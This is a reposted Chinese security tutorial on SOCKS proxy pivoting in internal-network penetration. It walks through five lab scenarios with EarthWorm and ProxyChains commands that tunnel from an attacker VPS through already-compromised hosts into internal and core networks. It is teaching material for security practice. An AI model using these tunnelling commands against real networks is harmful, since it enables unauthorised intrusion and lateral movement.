技术干货 | 内网渗透之SOCKS代理的5类基本场景

admin 2022年4月15日08:44:48评论175 views字数 2586阅读8分37秒阅读模式

本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安世加的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!


欢迎各位添加微信号:asj-jacky

加入安世加 交流群 和大佬们一起交流安全技术

SOCKS协议

SOCKS是一种网络传输协议,主要用于客户端与外网服务器之间通讯的中间传递。根据OSI七层模型,SOCKS协议属于会话层协议。当防火墙后面的客户端要访问外部的服务器时,就跟SOCKS代理服务器连接。在攻防层面,可以利用SOCKS协议建立通信隧道来访问内部网络,查看內部资源。SOCKS支持多种协议,包括HTTP、FTP等,目前协议最新版本为5。

SOCKS 5在客户端和服务端双方完成授权验证之后,由客户端请求建立连接,告诉服务端要访问哪个远程服务器,包括目标地址(可以是IPV4地址、IPV6、域名)和目标端口。

本地测试SOCKS代理转发,测试环境如下,3个网段分别模拟内网、外网、核心网:

  • 内网:10.1.1.0/24

  • 外网:192.168.2.0/24

  • 核心网:172.16.0.0/24

  • 代理工具:EarthWorm、ProxyChains

内网渗透之SOCKS代理转发

0x01 正向代理

正向代理适用于目标机器拥有一个外网IP地址且可对外任意开启监听端口的情况。

技术干货 | 内网渗透之SOCKS代理的5类基本场景

在web服务器上开启8888端口的SOCKS代理,通过访问此ip的8888端口即可使用该ip主机的SOCKS代理。

web服务器开启端口8888的SOCKS代理。

./ew_for_linux64 -s ssocksd -l 8888

攻击机使用ProxyChains进行连接,将火狐加入到代理隧道。

# 修改ProxyChains配置,设置目标代理IP和端口
vim /etc/proxychains.conf
proxychains firefox

技术干货 | 内网渗透之SOCKS代理的5类基本场景

尝试访问内网机器。

技术干货 | 内网渗透之SOCKS代理的5类基本场景

0x02 反向代理

反向代理适用于目标机器没有公网IP但能访问互联网的情况。

技术干货 | 内网渗透之SOCKS代理的5类基本场景

在vps上开启SOCKS 5代理,在vps上添加一个转发隧道,将6666端口的代理请求转发到本地的8888端口。。

./ew_for_linux64 -s rcsocks -l 6666 -e 8888

技术干货 | 内网渗透之SOCKS代理的5类基本场景

0x03 二级网络环境(网络边界存在外网IP)

假设目前通过一系列的方法获得了A主机和B主机的控制权限,A主机配有两个网卡,其中一个连接外网,另外一个网卡只能连接指定的内网服务器,除此之外无法访问内网中其他资源。B主机只能访问内网资源,但无法与外网通信。网络拓扑如下所示。

技术干货 | 内网渗透之SOCKS代理的5类基本场景

在B主机上开启SOCKS代理服务。

./ew_for_linux64 -s ssocksd -l 8888

技术干货 | 内网渗透之SOCKS代理的5类基本场景

然后在A主机上开启代理转发。

./ew_for_linux64 -s lcx_tran -l 6666 -f 10.1.1.128 -g 8888

技术干货 | 内网渗透之SOCKS代理的5类基本场景

外部主机通过访问A主机的6666端口,就能使用SOCKS 5代理了。

技术干货 | 内网渗透之SOCKS代理的5类基本场景

0x04 二级网络环境(网络边界不存在外网IP)

同样的,假设获得了A主机和B主机的控制权限,A主机既没有公网IP地址,也不能访问内网资源,但可以访问互联网。B主机可以访问内网资源,但无法访问外网。网络拓扑如下所示。

技术干货 | 内网渗透之SOCKS代理的5类基本场景

首先,在VPS中添加SOCKS转接隧道,将8888端口接收到的代理请求转发到6666端口。

./ew_for_linux64 -s lcx_listen -l 8888 -e 6666

技术干货 | 内网渗透之SOCKS代理的5类基本场景

然后,在B主机中,以ssocksd方式启动SOCKS代理,端口9999。

./ew_for_linux64 -s ssocksd -l 9999

技术干货 | 内网渗透之SOCKS代理的5类基本场景

接着,在A主机上以lcx_slave的方式,将VPS的6666端口和B主机的9999端口连接起来。

./ew_for_linux64 -s lcx_slave -d 192.168.2.141 -e 6666 -f 10.1.1.128 -g 9999

技术干货 | 内网渗透之SOCKS代理的5类基本场景

VPS终端上显示说明连接成功。

技术干货 | 内网渗透之SOCKS代理的5类基本场景

最后,通过这个VPS的8888端口即可使用B主机上的SOCKS代理,访问内网资源。

技术干货 | 内网渗透之SOCKS代理的5类基本场景

0x05 三级网络环境

在二级网络环境(网络边界不存在外网IP)的基础之上,如图所示,B主机可以访问C主机,C主机可访问到核心网络区域。

技术干货 | 内网渗透之SOCKS代理的5类基本场景

首先在VPS上,将8888端口的代理请求转发到6666端口。

./ew_for_linux64 -s rcsocks -l 8888 -e 6666

技术干货 | 内网渗透之SOCKS代理的5类基本场景

在A主机上,连接VPS的6666端口和B主机的9999端口。

./ew_for_linux64 -s lcx_slave -d 192.168.2.141 -e 6666 -f 10.1.1.128 -g 9999

技术干货 | 内网渗透之SOCKS代理的5类基本场景

在B主机上,将9999的代理请求转发到它自己的7777端口。

./ew_for_linux64 -s lcx_listen -l 9999 -e 7777

技术干货 | 内网渗透之SOCKS代理的5类基本场景

在C主机上,开启SOCKS 5代理服务,将其反弹到B主机的7777端口上。

./ew_for_linux64 -s rssocks -d 10.1.1.128 -e 7777

技术干货 | 内网渗透之SOCKS代理的5类基本场景

连接成功。

技术干货 | 内网渗透之SOCKS代理的5类基本场景

访问C主机资源。

技术干货 | 内网渗透之SOCKS代理的5类基本场景

猎豹安全中心技术分享频道





技术干货 | 内网渗透之SOCKS代理的5类基本场景  
  1. 海量日志分析的预处理

  2. OSSEC-Execd功能模块分析

  3. 通过流量快速识别域名信息

  4. 从android源码看脱壳

  5. Ossec-Agentd模块分析

  6. 猎豹移动DPIA系统开源

  7. 一种新的分词方法在机器学习中的应用

  8. Ossec-Logcollector模块分析

  9. Ossec-Agent-Syscheckd模块分析

  10. Ossec Agent总结

  11. HTTP走私漏洞分析

  12. BurpSuite扩展插件使用分享

  13. webshell连接工具流量分析

  14. JDK7u21调用链分析

  15. php函数中的那些坑

  16. 通过sqlmap源代码分析SQL注入漏洞检测流程

  17. 猎豹移动通过“全球首个隐私信息管理体系标准”ISO/IEC 27701认证

  18. DGA域名检测

  19. 基于NSL-KDD数据集的网络入侵检测分析

  20. 采用HAN网络模型的WebShell检测

  21. Suricata可视化规则(简单)编辑器及规则统计告警系统开源

  22. SQL注入检测

  23. Typecho利用链分析

  24. ISO27701

  25. phpinfo里面有什么?

  26. Django QuerySet.order_by() SQL注入分析



长按下方二维码关注我们

原文始发于微信公众号(安世加):技术干货 | 内网渗透之SOCKS代理的5类基本场景

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月15日08:44:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   技术干货 | 内网渗透之SOCKS代理的5类基本场景https://cn-sec.com/archives/913142.html

发表评论

匿名网友 填写信息